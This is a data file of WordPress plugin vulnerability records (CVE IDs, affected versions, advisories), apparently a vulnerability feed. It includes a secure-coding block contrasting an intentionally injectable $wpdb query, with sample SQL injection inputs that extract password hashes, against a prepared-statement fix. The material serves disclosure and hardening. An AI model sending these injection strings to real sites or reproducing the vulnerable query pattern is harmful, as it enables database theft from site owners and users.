{"CVE_ID":"CVE-2023-29096","slug":"contact-form-to-db","versionEndExcluding":"1.7.1","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BestWebSoft Contact Form to DB by BestWebSoft \u2013 Messages Database Plugin For WordPress. This issue affects Contact Form to DB by BestWebSoft \u2013 Messages Database Plugin For WordPress: from n\/a through 1.7.0.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-to-db\\\/wordpress-contact-form-to-db-by-bestwebsoft-plugin-1-7-0-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-to-db\\\/wordpress-contact-form-to-db-by-bestwebsoft-plugin-1-7-0-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5601","slug":"woocommerce-ninjaforms-product-addons","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The WooCommerce Ninja Forms Product Add-ons WordPress plugin before 1.7.1 does not validate the file to be uploaded, allowing any unauthenticated users to upload arbitrary files to the server, leading to RCE.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0035ec5e-d405-4eb7-8fe4-29dd0c71e4bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0035ec5e-d405-4eb7-8fe4-29dd0c71e4bc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8656","slug":"wpcodefactory-helper","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The WPFactory Helper plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb62eefe-9993-43f7-b3ae-de47c0951bee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb62eefe-9993-43f7-b3ae-de47c0951bee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcodefactory-helper\\\/tags\\\/1.7.0\\\/includes\\\/class-alg-wpcodefactory-helper-site-key-manager.php#L350\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcodefactory-helper\\\/tags\\\/1.7.0\\\/includes\\\/class-alg-wpcodefactory-helper-site-key-manager.php#L350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150715\\\/wpcodefactory-helper\\\/tags\\\/1.7.1\\\/includes\\\/class-alg-wpcodefactory-helper-site-key-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150715\\\/wpcodefactory-helper\\\/tags\\\/1.7.1\\\/includes\\\/class-alg-wpcodefactory-helper-site-key-manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8152","slug":"easy-sticky-sidebar","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The WP CTA \u2013 Call To Action Plugin, Sticky CTA, Sticky Buttons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_cta_status' and 'change_sticky_sidebar_name' functions in all versions up to, and including, 1.7.0. This makes it possible for unauthenticated attackers to update the status of a sticky and update the name displayed in the back-end WP CTA Dashboard.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-sticky-sidebar\\\/trunk\\\/inc\\\/ClassActions.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-sticky-sidebar\\\/trunk\\\/inc\\\/ClassActions.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-sticky-sidebar\\\/trunk\\\/inc\\\/ClassActions.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-sticky-sidebar\\\/trunk\\\/inc\\\/ClassActions.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336867%40easy-sticky-sidebar&new=3336867%40easy-sticky-sidebar&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336867%40easy-sticky-sidebar&new=3336867%40easy-sticky-sidebar&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/981ed50b-8f03-4320-99f0-3f53f7b2fc44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/981ed50b-8f03-4320-99f0-3f53f7b2fc44?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2890","slug":"td-subscription","versionImpact":"1.7","versionEndExcluding":"1.7.1","description":"The tagDiv Opt-In Builder plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018subscriptionCouponId\u2019 parameter in all versions up to, and including, 1.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-opt-in-builder\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-opt-in-builder\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fff1cff1-6745-4124-ba93-8b0749eae61a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fff1cff1-6745-4124-ba93-8b0749eae61a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3356","slug":"subscribers-text-counter","versionEndExcluding":"1.7.1","description":"The Subscribers Text Counter WordPress plugin before 1.7.1 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack, which also leads to Stored Cross-Site Scripting due to the lack of sanitisation and escaping.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93faad5b-e1e8-4e49-b19e-b91343d68b51\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93faad5b-e1e8-4e49-b19e-b91343d68b51\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6854","slug":"breakdance","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The Breakdance plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom postmeta output in all versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping on user supplied post meta fields. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e92a0387-bd09-46d3-9f6c-09f701b9e550?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e92a0387-bd09-46d3-9f6c-09f701b9e550?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/breakdance.com\\\/breakdance-1-7-1-now-available-security-update\\\/\",\"name\":\"https:\\\/\\\/breakdance.com\\\/breakdance-1-7-1-now-available-security-update\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4404","slug":"charitable","versionEndExcluding":"1.7.0.13","description":"The Donation Forms by Charitable plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.7.0.12 due to insufficient restriction on the 'update_core_user' function. This makes it possible for unauthenticated attackers to specify their user role by supplying the 'role' parameter during a registration.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/522ecc1c-5834-4325-9234-79cf712213f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/522ecc1c-5834-4325-9234-79cf712213f3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.7.0.12\\\/includes\\\/users\\\/class-charitable-user.php#L866\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.7.0.12\\\/includes\\\/users\\\/class-charitable-user.php#L866\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8738","slug":"seriously-simple-stats","versionImpact":"1.6.0","versionEndExcluding":"1.7.0","description":"The Seriously Simple Stats plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7f810f6-b8dd-4065-8113-9842b33202ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7f810f6-b8dd-4065-8113-9842b33202ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seriously-simple-stats\\\/trunk\\\/php\\\/classes\\\/class-ssp-stats.php#L1296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seriously-simple-stats\\\/trunk\\\/php\\\/classes\\\/class-ssp-stats.php#L1296\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153423%40seriously-simple-stats&new=3153423%40seriously-simple-stats&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153423%40seriously-simple-stats&new=3153423%40seriously-simple-stats&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13845","slug":"gravityformswebhooks","versionImpact":"1.6.0","versionEndExcluding":"1.7.0","description":"The Gravity Forms WebHooks plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.6.0 via the 'process_feed' method of the GF_Webhooks class. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.gravityforms.com\\\/blog\\\/brand-new-release-webhooks-add-on-1-7\\\/\",\"name\":\"https:\\\/\\\/www.gravityforms.com\\\/blog\\\/brand-new-release-webhooks-add-on-1-7\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9311b20b-daad-408f-a1a0-d1e42573ab97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9311b20b-daad-408f-a1a0-d1e42573ab97?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3129","slug":"url-shortify","versionEndExcluding":"1.7.0","description":"The URL Shortify WordPress plugin before 1.7.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5717d729-c24b-4415-bb99-fcdd259328c4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5717d729-c24b-4415-bb99-fcdd259328c4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0610","slug":"woo-payment-gateway-for-piraeus-bank","versionImpact":"1.6.5.1","versionEndExcluding":"1.7.0","description":"The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'MerchantReference' parameter in all versions up to, and including, 1.6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f17c4748-2a95-495c-ad3b-86b272855791?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f17c4748-2a95-495c-ad3b-86b272855791?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-23179","slug":"lead-form-builder","versionEndExcluding":"1.7.0","description":"The Contact Form & Lead Form Elementor Builder WordPress plugin before 1.7.0 does not escape some of its form fields before outputting them in attributes, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90b8af99-e4a1-4076-99fa-efe805dd4be4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90b8af99-e4a1-4076-99fa-efe805dd4be4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7626","slug":"delicious-recipes","versionImpact":"1.6.9","versionEndExcluding":"1.7.0","description":"The WP Delicious \u2013 Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file movement and reading due to insufficient file path validation in the save_edit_profile_details() function in all versions up to, and including, 1.6.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). This can also lead to the reading of arbitrary files that may contain sensitive information like wp-config.php.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c98bb53-9f7e-4ab3-9676-e3dbfb4a0519?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c98bb53-9f7e-4ab3-9676-e3dbfb4a0519?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delicious-recipes\\\/tags\\\/1.6.7\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php#L260\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delicious-recipes\\\/tags\\\/1.6.7\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php#L260\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delicious-recipes\\\/tags\\\/1.6.7\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php#L355\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delicious-recipes\\\/tags\\\/1.6.7\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php#L355\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148996\\\/delicious-recipes\\\/trunk\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148996\\\/delicious-recipes\\\/trunk\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3552","slug":"web-directory-free","versionImpact":"1.6.9","versionEndExcluding":"1.7.0","description":"The Web Directory Free WordPress plugin before 1.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34b03ee4-de81-4fec-9f3d-e1bd5b94d136\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34b03ee4-de81-4fec-9f3d-e1bd5b94d136\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
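The SQL injection records above (CVE-2023-29096, CVE-2025-2890, CVE-2024-0610, CVE-2024-3552) all describe the same defect: a request parameter concatenated into a $wpdb query with no $wpdb->prepare(). The following is an added example, not code from any of those plugins, showing the pattern next to its prepared form. The table name example_events, the AJAX action name and the nonce action are illustrative.

```php
<?php
// Added example, not from any plugin in these records. Assumes a plugin table
// {$wpdb->prefix}example_events with an integer id and a text title column.

// VULNERABLE: the request value is spliced into the statement. esc_sql() or
// sanitize_text_field() do not fix a numeric context either; a value such as
// "1 OR SLEEP(5)" or "1 UNION SELECT user_pass,1 FROM wp_users" still reaches
// MySQL, which is exactly the time-based and UNION-based injection the
// advisories describe.
function example_show_event_vulnerable() {
    global $wpdb;
    $id  = $_POST['id'] ?? '';
    $row = $wpdb->get_row(
        "SELECT id, title FROM {$wpdb->prefix}example_events WHERE id = " . $id
    );
    wp_send_json($row);
}

// HARDENED: nonce and capability first, then a prepared statement with a typed
// placeholder. %d forces an integer, so quotes, comments and subselects cannot
// survive; for text the placeholder is %s and the value is quoted for you.
function example_show_event_hardened() {
    global $wpdb;
    check_ajax_referer('example_events', 'nonce');
    if (!current_user_can('read')) {      // lowest role that legitimately needs this
        wp_send_json_error('forbidden', 403);
    }
    $id  = absint($_POST['id'] ?? 0);
    $row = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT id, title FROM {$wpdb->prefix}example_events WHERE id = %d",
            $id
        )
    );
    wp_send_json($row);
}
add_action('wp_ajax_example_show_event', 'example_show_event_hardened');

// Text search variant. %s handles quoting; esc_like() stops user-supplied % and _
// from acting as wildcards, and the wildcards you actually want are added after it.
function example_search_events(string $term): array {
    global $wpdb;
    $like = '%' . $wpdb->esc_like($term) . '%';
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT id, title FROM {$wpdb->prefix}example_events WHERE title LIKE %s",
            $like
        )
    );
}
```

A quick audit check for a plugin you host: grep its sources for `$wpdb->` calls whose SQL string contains a `$` or `.` concatenation and no `prepare(`; every hit that involves a request value is a candidate for one of the entries above.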
{"CVE_ID":"CVE-2025-3414","slug":"structured-content","versionImpact":"1.6.4","versionEndExcluding":"1.7.0","description":"The Structured Content (JSON-LD) #wpsc WordPress plugin before 1.7.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1dd322b5-3c1d-4da7-8737-e6688fc9f4df\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1dd322b5-3c1d-4da7-8737-e6688fc9f4df\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4339","slug":"ulisting","versionImpact":"1.6.6","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to authorization bypass due to a missing capability check in the \"ulisting\/includes\/route.php\" file on the \/1\/api\/ulisting-user\/search REST-API route in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to retrieve the list of all users and their email address in the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a6615fd-7c37-45d9-a657-0ba00df840e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a6615fd-7c37-45d9-a657-0ba00df840e5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6709","slug":"sync-post-with-other-site","versionImpact":"1.6","versionEndExcluding":"1.7","description":"The Sync Post With Other Site plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'sps_add_update_post' function in all versions up to, and including, 1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new draft posts and update existing posts.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d97eee1-0f72-4dd3-998a-acb454fa5e8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d97eee1-0f72-4dd3-998a-acb454fa5e8a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sync-post-with-other-site\\\/trunk\\\/includes\\\/sps_sync.class.php#L231\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sync-post-with-other-site\\\/trunk\\\/includes\\\/sps_sync.class.php#L231\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128945\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128945\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4753","slug":"wp-secure-maintainance","versionImpact":"1.6","versionEndExcluding":"1.7","description":"The WP Secure Maintenance WordPress plugin before 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81725b17-532a-43e6-8ce5-fe50a2ed0819\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81725b17-532a-43e6-8ce5-fe50a2ed0819\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13684","slug":"reset","versionImpact":"1.6","versionEndExcluding":"1.7","description":"The Reset plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6. This is due to missing or incorrect nonce validation on the reset_db_page() function. This makes it possible for unauthenticated attackers to reset several tables in the database like comments, themes, plugins, and more via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reset\\\/tags\\\/1.6\\\/delete_comments.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reset\\\/tags\\\/1.6\\\/delete_comments.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2335533d-c38a-450c-9fa1-0e236b5e92e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2335533d-c38a-450c-9fa1-0e236b5e92e6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1639","slug":"animation-addons-for-elementor-pro","versionImpact":"1.6","versionEndExcluding":"1.7","description":"The Animation Addons for Elementor Pro plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the install_elementor_plugin_handler() function in all versions up to, and including, 1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate arbitrary plugins which can be leveraged to further infect a victim when Elementor is not activated on a vulnerable site.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/arolax-creative-digital-agency-theme\\\/53547630\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/arolax-creative-digital-agency-theme\\\/53547630\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb310bdb-fc74-47b2-9371-3d10abd287fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb310bdb-fc74-47b2-9371-3d10abd287fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4370","slug":"ulisting","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to authorization bypass as most actions and endpoints are accessible to unauthenticated users, lack security nonces, and data is seldom validated. This issue exists in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to conduct numerous administrative actions, including those less critical than the explicitly outlined ones in our detection.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5ada976-03b8-4219-9ae3-9060fb7b9de5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5ada976-03b8-4219-9ae3-9060fb7b9de5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13665","slug":"admire-extra","versionImpact":"1.6","versionEndExcluding":"1.7","description":"The Admire Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'space' shortcode in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7, or a newer patched 